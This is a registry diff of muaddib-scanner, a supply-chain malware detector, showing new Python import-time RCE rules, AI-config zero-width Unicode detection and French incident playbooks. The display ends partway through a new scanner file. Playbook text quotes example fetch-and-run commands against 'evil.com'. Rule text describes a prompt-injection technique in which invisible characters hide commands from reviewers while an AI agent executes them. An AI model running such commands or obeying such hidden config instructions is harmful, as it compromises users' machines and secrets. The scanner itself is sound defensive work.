muaddib-scanner 2.11.39 → 2.11.41

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "muaddib-scanner",
3
- "version": "2.11.39",
3
+ "version": "2.11.41",
4
4
  "description": "Supply-chain threat detection & response for npm & PyPI/Python",
5
5
  "main": "src/index.js",
6
6
  "bin": {
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "target": "node_modules",
3
- "timestamp": "2026-05-25T08:33:11.787Z",
3
+ "timestamp": "2026-05-25T10:35:47.158Z",
4
4
  "threats": [
5
5
  {
6
6
  "type": "string_mutation_obfuscation",
@@ -870,6 +870,27 @@
870
870
  "playbook": "CRITIQUE: Execution de commande shell dangereuse detectee. Isoler la machine. Verifier si la commande a ete executee.",
871
871
  "points": 3
872
872
  },
873
+ {
874
+ "type": "unicode_invisible_injection",
875
+ "severity": "CRITICAL",
876
+ "message": "10 invisible Unicode characters detected (zero-width, variation selectors, tag chars). Possible hidden payload encoded via invisible codepoints.",
877
+ "file": "iconv-lite/encodings/sbcs-data-generated.js",
878
+ "count": 1,
879
+ "reductions": [],
880
+ "originalSeverity": "CRITICAL",
881
+ "confidenceTier": "medium",
882
+ "rule_id": "MUADDIB-OBF-003",
883
+ "rule_name": "Unicode Invisible Character Injection",
884
+ "confidence": "high",
885
+ "domain": "malware",
886
+ "references": [
887
+ "https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode",
888
+ "https://attack.mitre.org/techniques/T1027/"
889
+ ],
890
+ "mitre": "T1027",
891
+ "playbook": "CRITIQUE: Caracteres Unicode invisibles detectes (zero-width, variation selectors). Technique GlassWorm: du code malveillant est encode via des variation selectors invisibles dans les editeurs. Analyser le fichier avec un editeur hexa. Supprimer le package immediatement. Verifier les autres fichiers du projet pour des injections similaires.",
892
+ "points": 25
893
+ },
873
894
  {
874
895
  "type": "high_entropy_string",
875
896
  "severity": "LOW",
@@ -1107,17 +1128,17 @@
1107
1128
  ],
1108
1129
  "python": null,
1109
1130
  "summary": {
1110
- "total": 51,
1111
- "critical": 2,
1131
+ "total": 52,
1132
+ "critical": 3,
1112
1133
  "high": 6,
1113
1134
  "medium": 28,
1114
1135
  "low": 15,
1115
1136
  "riskScore": 35,
1116
1137
  "riskLevel": "MEDIUM",
1117
1138
  "globalRiskScore": 100,
1118
- "maxFileScore": 25,
1139
+ "maxFileScore": 26,
1119
1140
  "packageScore": 1,
1120
- "mostSuspiciousFile": "ajv/lib/ajv.js",
1141
+ "mostSuspiciousFile": "iconv-lite/encodings/sbcs-data-generated.js",
1121
1142
  "fileScores": {
1122
1143
  "esquery/parser.js": 5,
1123
1144
  "ajv/lib/ajv.js": 25,
@@ -1133,7 +1154,7 @@
1133
1154
  "eslint/lib/config/config-loader.js": 11,
1134
1155
  "eslint/lib/eslint/eslint-helpers.js": 25,
1135
1156
  "eslint/lib/eslint/eslint.js": 13,
1136
- "iconv-lite/encodings/sbcs-data-generated.js": 1,
1157
+ "iconv-lite/encodings/sbcs-data-generated.js": 26,
1137
1158
  "iconv-lite/encodings/sbcs-data.js": 1,
1138
1159
  "ajv/lib/compile/formats.js": 1
1139
1160
  },
@@ -1169,6 +1190,12 @@
1169
1190
  "points": 25,
1170
1191
  "reason": "Dynamic import() with computed URL argument — remote code loading from dynamically constructed URL."
1171
1192
  },
1193
+ {
1194
+ "rule": "MUADDIB-OBF-003",
1195
+ "type": "unicode_invisible_injection",
1196
+ "points": 25,
1197
+ "reason": "10 invisible Unicode characters detected (zero-width, variation selectors, tag chars). Possible hidden payload encoded via invisible codepoints."
1198
+ },
1172
1199
  {
1173
1200
  "rule": "MUADDIB-AST-006",
1174
1201
  "type": "dynamic_require",
@@ -1461,7 +1488,7 @@
1461
1488
  "tierCounts": {
1462
1489
  "verified": 0,
1463
1490
  "high": 0,
1464
- "medium": 9,
1491
+ "medium": 10,
1465
1492
  "low": 42
1466
1493
  },
1467
1494
  "perceivedFlagged": 0
@@ -20,6 +20,7 @@ const { deobfuscate } = require('../scanner/deobfuscate.js');
20
20
  const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
21
21
  const { loadCachedIOCs, checkIOCStaleness } = require('../ioc/updater.js');
22
22
  const { detectPythonProject, normalizePythonName } = require('../scanner/python.js');
23
+ const { scanPythonSource } = require('../scanner/python-source.js');
23
24
  const { Spinner, listInstalledPackages, wasFilesCapped, getOverflowFiles, debugLog } = require('../utils.js');
24
25
  const { getMaxFileSize } = require('../shared/constants.js');
25
26
  const { scanParanoid } = require('../scanner/paranoid.js');
@@ -202,7 +203,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
202
203
  'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
203
204
  'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
204
205
  'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
205
- 'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
206
+ 'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff', 'scanPythonSource'
206
207
  ];
207
208
 
208
209
  const settledResults = await Promise.allSettled([
@@ -228,7 +229,12 @@ async function execute(targetPath, options, pythonDeps, warnings) {
228
229
  // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
229
230
  // internal timeouts, but a registry slowdown with many added deps could exceed
230
231
  // the static-scan budget without this cap.
231
- withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
232
+ withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff'),
233
+ // PYSRC-001..008 (v2.11.25, TrapDoor PyPI gap). Detect import-time RCE
234
+ // in __init__.py / setup.py / top-level .py files. Runs always — not gated
235
+ // on detectPythonProject() because an attacker can ship a malicious __init__.py
236
+ // without a requirements.txt. Walker is cheap (just a depth-1 readdir).
237
+ yieldThen(() => scanPythonSource(targetPath))
232
238
  ]);
233
239
 
234
240
  // Extract results: use empty array for rejected scanners, log errors
@@ -258,7 +264,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
258
264
  antiForensicThreats,
259
265
  stubPackageThreats,
260
266
  monorepoThreats,
261
- trustedDepDiffThreats
267
+ trustedDepDiffThreats,
268
+ pythonSourceThreats
262
269
  ] = scanResult;
263
270
 
264
271
  // Emit warning if file count cap was hit + quick-scan overflow files
@@ -339,6 +346,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
339
346
  ...stubPackageThreats,
340
347
  ...monorepoThreats,
341
348
  ...trustedDepDiffThreats,
349
+ ...pythonSourceThreats,
342
350
  ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
343
351
  type: f.type,
344
352
  severity: f.severity,
@@ -399,6 +399,69 @@ const PLAYBOOKS = {
399
399
  'Technique Shai-Hulud (TeamPCP). Supprimer les fichiers .claude/settings.json ' +
400
400
  'et .vscode/tasks.json avant ouverture.',
401
401
 
402
+ aiconf_unicode_obfuscation:
403
+ 'CRITIQUE: Fichier de config d\'agent IA contient des caracteres Unicode invisibles ' +
404
+ '(zero-width, directional override, variation selectors). Technique TrapDoor (mai 2026): ' +
405
+ 'l\'attaquant insere des U+200B au milieu de mots-cles pour echapper a la revue humaine ' +
406
+ 'et aux regex statiques, tandis que l\'agent IA (Claude, Cursor) lit le contenu normalise ' +
407
+ 'et execute le payload cache. NE PAS ouvrir ce projet avec un agent IA. Ouvrir le fichier ' +
408
+ 'dans un editeur qui affiche les caracteres invisibles (VS Code: "editor.renderControlCharacters") ' +
409
+ 'pour inspecter le contenu reel. Supprimer le fichier ou nettoyer les caracteres invisibles ' +
410
+ 'avant toute utilisation. Si deja ouvert avec un agent IA, regenerer tous les secrets touches.',
411
+
412
+ import_time_exec:
413
+ 'CRITIQUE: Le fichier Python (__init__.py / setup.py / module top-level) execute exec() ou eval() ' +
414
+ 'a l\'import ou pip install. RCE immediat sur la machine de l\'utilisateur. ' +
415
+ 'NE PAS installer ce package. Si deja installe: pip uninstall immediatement, ' +
416
+ 'auditer les processus en cours, regenerer les credentials potentiellement compromis. ' +
417
+ 'Inspecter le code exec/eval pour identifier le payload reel.',
418
+
419
+ import_time_subprocess:
420
+ 'CRITIQUE: Le fichier Python spawn un processus externe (subprocess.Popen/run/call/check_output) ' +
421
+ 'a l\'import ou pip install. Generalement utilise pour fetch + execute remote payload, ' +
422
+ 'lateral movement, ou installation de persistence. NE PAS installer. Verifier le contenu ' +
423
+ 'de l\'appel pour identifier la commande executee. Auditer les processus enfants si deja installe.',
424
+
425
+ import_time_os_system:
426
+ 'CRITIQUE: Le fichier Python execute des commandes shell (os.system / os.popen / os.spawn / os.exec) ' +
427
+ 'a l\'import ou pip install. Pattern frequent: "curl evil.com | sh" ou "wget evil.com | bash". ' +
428
+ 'NE PAS installer. Inspecter la commande exacte. Si execute: considerer la machine compromise.',
429
+
430
+ import_time_fetch_exec:
431
+ 'CRITIQUE: Pattern TrapDoor detecte. Le fichier Python fetch un payload depuis le reseau ' +
432
+ '(urllib/requests/http.client/httpx/aiohttp) ET execute du code (exec/eval) dans le meme fichier. ' +
433
+ 'C\'est la signature directe d\'une remote-payload-then-RCE. NE PAS installer. ' +
434
+ 'Bloquer le domaine du fetch dans le firewall. Si execute: incident response complet, ' +
435
+ 'regenerer TOUS les secrets sur la machine (SSH, AWS, GitHub, npm, env vars).',
436
+
437
+ import_time_base64_exec:
438
+ 'CRITIQUE: Le fichier Python base64-decode du contenu ET execute (exec/eval) dans le meme fichier. ' +
439
+ 'Pattern d\'obfuscation classique: payload encode pour echapper a la revue + grep statique. ' +
440
+ 'NE PAS installer. Decoder le base64 manuellement pour identifier le payload reel ' +
441
+ '(python3 -c "import base64; print(base64.b64decode(b\'<payload>\').decode())").',
442
+
443
+ import_time_deserialization:
444
+ 'CRITIQUE: Le fichier Python utilise pickle/marshal/dill/cloudpickle .loads() au niveau module. ' +
445
+ 'Ces fonctions sont triviallement RCE si l\'input deserializise vient d\'une source attaquant-controllee ' +
446
+ '(fichier sur disque, requete HTTP, env var). NE PAS installer si l\'origine du blob deserialize ' +
447
+ 'n\'est pas un fichier de donnees interne au package. Si interne: verifier l\'integrite (signature, hash).',
448
+
449
+ dynamic_dangerous_import:
450
+ 'HIGH: Le fichier Python utilise __import__() avec un nom hardcode dangereux ' +
451
+ '(subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). ' +
452
+ 'Pattern d\'obfuscation: evite "import X" statique pour bypass les scanners qui ne tracent ' +
453
+ 'que les imports declares. Combinaison avec exec/subprocess/fetch indique malveillance. ' +
454
+ 'Inspecter manuellement les appels suivants au module dynamiquement importe.',
455
+
456
+ python_source_unicode_obfuscation:
457
+ 'CRITIQUE: Fichier Python contient ≥5 caracteres Unicode invisibles ' +
458
+ '(zero-width, directional override, variation selectors, tag characters). ' +
459
+ 'Python rejette les identifiers avec ZW (PEP 3131 SyntaxError), donc le vecteur est ' +
460
+ 'soit (a) obfuscation dans des strings (GlassWorm-style payload encoding via variation selectors), ' +
461
+ 'soit (b) comments avec ZW pour induire en erreur la revue humaine. ' +
462
+ 'NE PAS installer. Ouvrir le fichier dans un editeur affichant les caracteres invisibles ' +
463
+ '(VS Code: "editor.renderControlCharacters") pour inspecter le contenu reel.',
464
+
402
465
  ai_agent_abuse:
403
466
  'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
404
467
  '(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +
@@ -224,6 +224,121 @@ const RULES = {
224
224
  ],
225
225
  mitre: 'T1195.002'
226
226
  },
227
+
228
+ // PYSRC-001 a 008 — Python source scanner (TrapDoor PyPI gap, v2.11.25).
229
+ // python.js est manifest-only ; ast.js/dataflow.js sont JS-only ; ioc-strings.js
230
+ // fait du literal match. Aucun ne couvre l'execution a l'import via __init__.py
231
+ // / setup.py. Ces 8 regles ferment ce gap.
232
+ import_time_exec: {
233
+ id: 'MUADDIB-PYSRC-001',
234
+ name: 'Python Import-Time exec/eval',
235
+ severity: 'CRITICAL',
236
+ confidence: 'high',
237
+ domain: 'malware',
238
+ description: 'Fichier Python (__init__.py, setup.py, top-level *.py) contient exec()/eval() — execution directe de code a l\'import ou a pip install. RCE immediat sur la machine de l\'utilisateur. Pattern central de TrapDoor (mai 2026).',
239
+ references: [
240
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
241
+ 'https://attack.mitre.org/techniques/T1059/006/'
242
+ ],
243
+ mitre: 'T1059.006'
244
+ },
245
+ import_time_subprocess: {
246
+ id: 'MUADDIB-PYSRC-002',
247
+ name: 'Python Import-Time subprocess',
248
+ severity: 'CRITICAL',
249
+ confidence: 'high',
250
+ domain: 'malware',
251
+ description: 'Fichier Python contient subprocess.Popen/run/call/check_output au niveau module — spawn d\'un processus externe a l\'import ou pip install. Utilise pour fetch + execute remote payload ou pour latteral movement.',
252
+ references: [
253
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
254
+ 'https://attack.mitre.org/techniques/T1059/006/'
255
+ ],
256
+ mitre: 'T1059.006'
257
+ },
258
+ import_time_os_system: {
259
+ id: 'MUADDIB-PYSRC-003',
260
+ name: 'Python Import-Time os.system / os.popen / os.spawn / os.exec',
261
+ severity: 'CRITICAL',
262
+ confidence: 'high',
263
+ domain: 'malware',
264
+ description: 'Fichier Python contient os.system(), os.popen(), os.spawn*() ou os.exec*() au niveau module — shell execution a l\'import ou pip install. Generalement utilise pour curl|sh ou wget|bash remote payload.',
265
+ references: [
266
+ 'https://attack.mitre.org/techniques/T1059/006/',
267
+ 'https://attack.mitre.org/techniques/T1059/004/'
268
+ ],
269
+ mitre: 'T1059.006'
270
+ },
271
+ import_time_fetch_exec: {
272
+ id: 'MUADDIB-PYSRC-004',
273
+ name: 'Python Import-Time Fetch + Exec (TrapDoor pattern)',
274
+ severity: 'CRITICAL',
275
+ confidence: 'high',
276
+ domain: 'malware',
277
+ description: 'Compound detection : le meme fichier Python contient (urllib.request / requests / http.client / httpx / aiohttp) ET exec()/eval(). Signature directe de TrapDoor : telecharge un payload depuis le C2 et l\'execute. Implique RCE + capacite C2 active.',
278
+ references: [
279
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
280
+ 'https://attack.mitre.org/techniques/T1105/',
281
+ 'https://attack.mitre.org/techniques/T1059/006/'
282
+ ],
283
+ mitre: 'T1105'
284
+ },
285
+ import_time_base64_exec: {
286
+ id: 'MUADDIB-PYSRC-005',
287
+ name: 'Python Import-Time Base64 Decode + Exec',
288
+ severity: 'CRITICAL',
289
+ confidence: 'high',
290
+ domain: 'malware',
291
+ description: 'Compound detection : le meme fichier Python contient base64.b64decode / codecs.decode ET exec()/eval(). Pattern d\'obfuscation classique : payload encode en base64 (parfois chaine multiple) puis execute. Vu dans Lazarus PyPI campaigns + TrapDoor.',
292
+ references: [
293
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
294
+ 'https://attack.mitre.org/techniques/T1027/',
295
+ 'https://attack.mitre.org/techniques/T1059/006/'
296
+ ],
297
+ mitre: 'T1027'
298
+ },
299
+ import_time_deserialization: {
300
+ id: 'MUADDIB-PYSRC-006',
301
+ name: 'Python Import-Time Unsafe Deserialization',
302
+ severity: 'CRITICAL',
303
+ confidence: 'high',
304
+ domain: 'vulnerability',
305
+ description: 'Fichier Python utilise pickle/cPickle/marshal/dill/cloudpickle/jsonpickle/shelve .loads() au niveau module. Ces fonctions sont trivialement RCE si l\'input est attaquant-controle (deserialization = code execution). Risque critique meme sans malveillance prouvee.',
306
+ references: [
307
+ 'https://docs.python.org/3/library/pickle.html#restricting-globals',
308
+ 'https://attack.mitre.org/techniques/T1059/006/',
309
+ 'https://cwe.mitre.org/data/definitions/502.html'
310
+ ],
311
+ mitre: 'T1059.006'
312
+ },
313
+ dynamic_dangerous_import: {
314
+ id: 'MUADDIB-PYSRC-007',
315
+ name: 'Python Dynamic __import__ of Dangerous Module',
316
+ severity: 'HIGH',
317
+ confidence: 'medium',
318
+ domain: 'malware',
319
+ description: 'Fichier Python utilise __import__() avec un nom hardcode dangereux (subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). Pattern d\'obfuscation : evite l\'instruction "import X" statique pour echapper aux scanners qui ne tracent que les imports declares.',
320
+ references: [
321
+ 'https://attack.mitre.org/techniques/T1027/',
322
+ 'https://docs.python.org/3/library/functions.html#import__'
323
+ ],
324
+ mitre: 'T1027'
325
+ },
326
+ python_source_unicode_obfuscation: {
327
+ id: 'MUADDIB-PYSRC-008',
328
+ name: 'Python Source Unicode Obfuscation',
329
+ severity: 'CRITICAL',
330
+ confidence: 'high',
331
+ domain: 'malware',
332
+ description: 'Fichier Python contient ≥5 caracteres Unicode invisibles (zero-width, directional override, variation selectors, tag characters). Mirror de AICONF-004 pour les sources .py. Python rejette les identifiers avec ZW chars (SyntaxError, PEP 3131), donc le vecteur principal c\'est l\'obfuscation dans les strings (GlassWorm-style payload encoding) ou dans les comments (mislead human review).',
333
+ references: [
334
+ 'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
335
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
336
+ 'https://trojansource.codes/',
337
+ 'https://attack.mitre.org/techniques/T1027/'
338
+ ],
339
+ mitre: 'T1027.013'
340
+ },
341
+
227
342
  suspicious_file: {
228
343
  id: 'MUADDIB-DEP-002',
229
344
  name: 'Suspicious File in Dependency',
@@ -914,6 +1029,21 @@ const RULES = {
914
1029
  ],
915
1030
  mitre: 'T1546'
916
1031
  },
1032
+ aiconf_unicode_obfuscation: {
1033
+ id: 'MUADDIB-AICONF-004',
1034
+ name: 'Zero-Width Unicode Obfuscation in AI Config',
1035
+ severity: 'CRITICAL',
1036
+ confidence: 'high',
1037
+ domain: 'malware',
1038
+ description: 'Fichier de configuration d\'agent IA (.cursorrules, CLAUDE.md, copilot-instructions.md) contient des caracteres Unicode invisibles (zero-width, directional override, variation selectors) qui cachent des instructions a la revue humaine ou cassent des mots-cles pour echapper a la detection regex. Technique TrapDoor (mai 2026): cu​rl|sh interspersee de U+200B passe au travers du regex /curl/ tandis que l\'agent IA execute le payload normalise.',
1039
+ references: [
1040
+ 'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
1041
+ 'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
1042
+ 'https://trojansource.codes/',
1043
+ 'https://attack.mitre.org/techniques/T1027/'
1044
+ ],
1045
+ mitre: 'T1027.013'
1046
+ },
917
1047
 
918
1048
  require_cache_poison: {
919
1049
  id: 'MUADDIB-AST-019',
@@ -18,6 +18,14 @@
18
18
 
19
19
  const fs = require('fs');
20
20
  const path = require('path');
21
+ const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
22
+
23
+ // Threshold above which an AI config file is flagged as ZW-Unicode-obfuscated.
24
+ // Lower than obfuscation.js (10) because .cursorrules / CLAUDE.md should never
25
+ // legitimately contain invisible codepoints — even international content uses
26
+ // only visible chars (CJK, accents, emoji with U+FE0F variation selector are
27
+ // NOT counted by countInvisibleUnicode).
28
+ const AI_CONFIG_ZW_THRESHOLD = 5;
21
29
 
22
30
  // AI agent config files to scan for prompt injection (relative to project root)
23
31
  const AI_CONFIG_FILES = [
@@ -111,7 +119,12 @@ function scanAIConfig(targetPath) {
111
119
  }
112
120
 
113
121
  const relPath = configFile;
114
- const fileThreats = analyzeAIConfigFile(content, relPath);
122
+ // Normalize invisible Unicode BEFORE running regex patterns.
123
+ // Without this, an attacker can split keywords with U+200B (`cu​rl`) to
124
+ // evade /curl\s+/ — the exact TrapDoor (mai 2026) .cursorrules vector.
125
+ const invisibleCount = countInvisibleUnicode(content);
126
+ const normalized = invisibleCount > 0 ? stripInvisibleUnicode(content) : content;
127
+ const fileThreats = analyzeAIConfigFile(normalized, relPath, invisibleCount);
115
128
  threats.push(...fileThreats);
116
129
  }
117
130
 
@@ -218,14 +231,30 @@ function analyzeIDEHookFile(content, relPath) {
218
231
  }
219
232
 
220
233
  /**
221
- * Analyze a single AI config file for prompt injection patterns
234
+ * Analyze a single AI config file for prompt injection patterns.
235
+ *
236
+ * @param {string} content - File content, already normalized (invisible Unicode stripped).
237
+ * @param {string} relPath - Relative path of the config file.
238
+ * @param {number} invisibleCount - Number of invisible Unicode codepoints in the original (pre-strip) content.
222
239
  */
223
- function analyzeAIConfigFile(content, relPath) {
240
+ function analyzeAIConfigFile(content, relPath, invisibleCount) {
224
241
  const threats = [];
225
242
  let hasShellCommand = false;
226
243
  let hasExfiltration = false;
227
244
  let hasCredentialAccess = false;
228
245
 
246
+ // Zero-width / directional Unicode obfuscation (TrapDoor, mai 2026).
247
+ // An attacker can hide instructions or split keywords with U+200B etc. so
248
+ // human reviewers see "harmless" text while the AI agent reads the payload.
249
+ if (invisibleCount >= AI_CONFIG_ZW_THRESHOLD) {
250
+ threats.push({
251
+ type: 'aiconf_unicode_obfuscation',
252
+ severity: 'CRITICAL',
253
+ message: `AI config contains ${invisibleCount} invisible Unicode characters (zero-width / directional / variation selectors) in ${relPath} — content was normalized before pattern matching. Possible hidden instructions or keyword-splitting evasion (TrapDoor pattern).`,
254
+ file: relPath
255
+ });
256
+ }
257
+
229
258
  // Check shell command patterns
230
259
  for (const pattern of SHELL_COMMAND_PATTERNS) {
231
260
  if (pattern.regex.test(content)) {
@@ -1,6 +1,7 @@
1
1
  const fs = require('fs');
2
2
  const path = require('path');
3
3
  const { findFiles, forEachSafeFile, debugLog } = require('../utils.js');
4
+ const { countInvisibleUnicode } = require('../shared/unicode-invisibles.js');
4
5
 
5
6
  // node_modules NOT excluded: detect obfuscated code in dependencies.
6
7
  // dist/build/out/output excluded: bundled output is always flagged as isPackageOutput (LOW)
@@ -198,52 +199,4 @@ function hasLargeStringArray(content) {
198
199
  return false;
199
200
  }
200
201
 
201
- /**
202
- * Count invisible Unicode codepoints in content (GlassWorm detection).
203
- * Covers BMP zero-width chars, variation selectors, and supplementary plane
204
- * tag characters / variation selectors supplement via codePointAt iteration.
205
- *
206
- * Codepoints detected:
207
- * - U+200B, U+200C, U+200D (zero-width space/joiner/non-joiner)
208
- * - U+FEFF (BOM — only if position > 0; pos 0 is legitimate BOM)
209
- * - U+2060 (word joiner), U+180E (Mongolian vowel separator)
210
- * - U+FE00-U+FE0E (variation selectors — excludes U+FE0F emoji presentation selector)
211
- * - U+E0100-U+E01EF (variation selectors supplement)
212
- * - U+E0001-U+E007F (tag characters)
213
- */
214
- function countInvisibleUnicode(content) {
215
- let count = 0;
216
- for (let i = 0; i < content.length; i++) {
217
- const cp = content.codePointAt(i);
218
- // BMP invisible chars
219
- if (cp === 0x200B || cp === 0x200C || cp === 0x200D ||
220
- cp === 0x2060 || cp === 0x180E) {
221
- count++;
222
- }
223
- // BOM only suspicious after position 0
224
- else if (cp === 0xFEFF && i > 0) {
225
- count++;
226
- }
227
- // BMP variation selectors (U+FE00-U+FE0E) — excludes U+FE0F (emoji presentation selector)
228
- else if (cp >= 0xFE00 && cp <= 0xFE0E) {
229
- count++;
230
- }
231
- // Supplementary plane: variation selectors supplement (U+E0100-U+E01EF)
232
- else if (cp >= 0xE0100 && cp <= 0xE01EF) {
233
- count++;
234
- i++; // skip surrogate pair low half
235
- }
236
- // Supplementary plane: tag characters (U+E0001-U+E007F)
237
- else if (cp >= 0xE0001 && cp <= 0xE007F) {
238
- count++;
239
- i++; // skip surrogate pair low half
240
- }
241
- // Skip surrogate pair low half for other supplementary chars
242
- else if (cp > 0xFFFF) {
243
- i++;
244
- }
245
- }
246
- return count;
247
- }
248
-
249
202
  module.exports = { detectObfuscation };
@@ -0,0 +1,319 @@
1
+ 'use strict';
2
+
3
+ /**
4
+ * Python Source Scanner — detects import-time / install-time RCE patterns.
5
+ *
6
+ * Created v2.11.25 (TrapDoor PyPI gap, mai 2026). `python.js` is a manifest
7
+ * parser (requirements.txt, setup.py, pyproject.toml — extracts dep names) ;
8
+ * it never reads package source. `ast.js` / `dataflow.js` use acorn (JS only)
9
+ * and skip `.py`. Only `ioc-strings.js` opens `.py` files, just for literal
10
+ * IOC matching. → A malicious `__init__.py` that fetches + execs a payload at
11
+ * import time was invisible to MUAD'DIB. This scanner closes that gap.
12
+ *
13
+ * Pas d'AST Python (CLAUDE.md interdit les deps runtime hors acorn / js-yaml /
14
+ * adm-zip / @inquirer/prompts). Détection par regex ciblées sur les API
15
+ * dangereuses, avec préprocessing :
16
+ * - strip des full-line comments (`^\s*#.*$`)
17
+ * - strip des triple-quoted strings (docstrings, block strings — réduit les
18
+ * FPs sur les docs qui mentionnent `exec`)
19
+ * - strip des chars Unicode invisibles via le helper partagé (mirror du fix
20
+ * AICONF-004 : empêche `e<ZWSP>xec(` de bypass — bien que Python rejette
21
+ * cet identifier comme SyntaxError, des invisibles dans des strings/comments
22
+ * restent un signal d'obfuscation valide).
23
+ *
24
+ * Rules : PYSRC-001 à PYSRC-008. Voir src/rules/index.js pour le détail.
25
+ *
26
+ * Références :
27
+ * - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
28
+ * - https://attack.mitre.org/techniques/T1059/006/ (Command Scripting Interpreter: Python)
29
+ */
30
+
31
+ const fs = require('fs');
32
+ const path = require('path');
33
+ const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
34
+
35
+ const MAX_FILE_SIZE = 1024 * 1024; // 1 MB cap, cohérent avec ai-config.js
36
+
37
+ const PYSRC_UNICODE_THRESHOLD = 5;
38
+
39
+ // Dirs to skip when looking for __init__.py at depth-1. Couvre les patterns
40
+ // classiques (virtualenv, caches, tests, docs, build artifacts).
41
+ const EXCLUDED_DIRS = new Set([
42
+ 'tests', 'test', '__pycache__', '.pytest_cache', '.tox', '.nox',
43
+ '.venv', 'venv', 'env', '.env',
44
+ '.git', '.hg', '.svn',
45
+ 'node_modules',
46
+ 'examples', 'example', 'sample', 'samples',
47
+ 'docs', 'doc',
48
+ 'build', 'dist', 'site-packages',
49
+ '.mypy_cache', '.ruff_cache', '.pytype', '.pyre',
50
+ '.muaddib-cache', '.idea', '.vscode'
51
+ ]);
52
+
53
+ // Files explicitly targeted at root (always scanned if present).
54
+ const ROOT_TARGET_FILES = ['__init__.py', 'setup.py'];
55
+
56
+ /**
57
+ * Locate Python files that execute at import or install time.
58
+ *
59
+ * @param {string} targetPath
60
+ * @returns {string[]} Absolute file paths, deduplicated.
61
+ */
62
+ function findTargetPythonFiles(targetPath) {
63
+ const targets = new Set();
64
+
65
+ let rootEntries;
66
+ try {
67
+ rootEntries = fs.readdirSync(targetPath);
68
+ } catch {
69
+ return [];
70
+ }
71
+
72
+ // 1. ROOT_TARGET_FILES + every *.py at root (single-module packages)
73
+ for (const entry of rootEntries) {
74
+ if (!entry.endsWith('.py') && !ROOT_TARGET_FILES.includes(entry)) continue;
75
+ const full = path.join(targetPath, entry);
76
+ try {
77
+ if (fs.statSync(full).isFile()) targets.add(full);
78
+ } catch { /* ignore */ }
79
+ }
80
+
81
+ // 2. <subdir>/__init__.py at depth 1 (covers <pkg>/__init__.py layout)
82
+ for (const entry of rootEntries) {
83
+ if (EXCLUDED_DIRS.has(entry)) continue;
84
+ if (entry.startsWith('.') && entry !== '.') continue; // skip hidden dirs by default
85
+ const subdir = path.join(targetPath, entry);
86
+ try {
87
+ if (!fs.statSync(subdir).isDirectory()) continue;
88
+ } catch { continue; }
89
+
90
+ const initPy = path.join(subdir, '__init__.py');
91
+ try {
92
+ if (fs.statSync(initPy).isFile()) targets.add(initPy);
93
+ } catch { /* not a file */ }
94
+
95
+ // 3. src/<pkg>/__init__.py for PEP-518 src-layout
96
+ if (entry === 'src') {
97
+ let innerEntries;
98
+ try {
99
+ innerEntries = fs.readdirSync(subdir);
100
+ } catch { continue; }
101
+ for (const inner of innerEntries) {
102
+ if (EXCLUDED_DIRS.has(inner)) continue;
103
+ if (inner.startsWith('.')) continue;
104
+ const innerDir = path.join(subdir, inner);
105
+ try {
106
+ if (!fs.statSync(innerDir).isDirectory()) continue;
107
+ } catch { continue; }
108
+ const innerInit = path.join(innerDir, '__init__.py');
109
+ try {
110
+ if (fs.statSync(innerInit).isFile()) targets.add(innerInit);
111
+ } catch { /* not a file */ }
112
+ }
113
+ }
114
+ }
115
+
116
+ return [...targets];
117
+ }
118
+
119
+ /**
120
+ * Strip full-line Python comments (lines whose first non-whitespace char is `#`).
121
+ * Inline trailing comments are kept to avoid the complexity of a tokenizer.
122
+ *
123
+ * @param {string} content
124
+ * @returns {string}
125
+ */
126
+ function stripPythonComments(content) {
127
+ return content.split(/\r?\n/).map(line => {
128
+ const trimmed = line.trimStart();
129
+ if (trimmed.startsWith('#')) return '';
130
+ return line;
131
+ }).join('\n');
132
+ }
133
+
134
+ /**
135
+ * Strip triple-quoted strings (`"""..."""` and `'''...'''`). These are
136
+ * typically docstrings or block-string literals containing free-form text
137
+ * that may mention keywords like `exec` or `subprocess` without being a real
138
+ * call site. Single-quoted strings are preserved (an attacker often hides
139
+ * the payload inside `exec("import os; ...")`).
140
+ *
141
+ * @param {string} content
142
+ * @returns {string}
143
+ */
144
+ function stripTripleQuotedStrings(content) {
145
+ return content
146
+ .replace(/"""[\s\S]*?"""/g, '""')
147
+ .replace(/'''[\s\S]*?'''/g, "''");
148
+ }
149
+
150
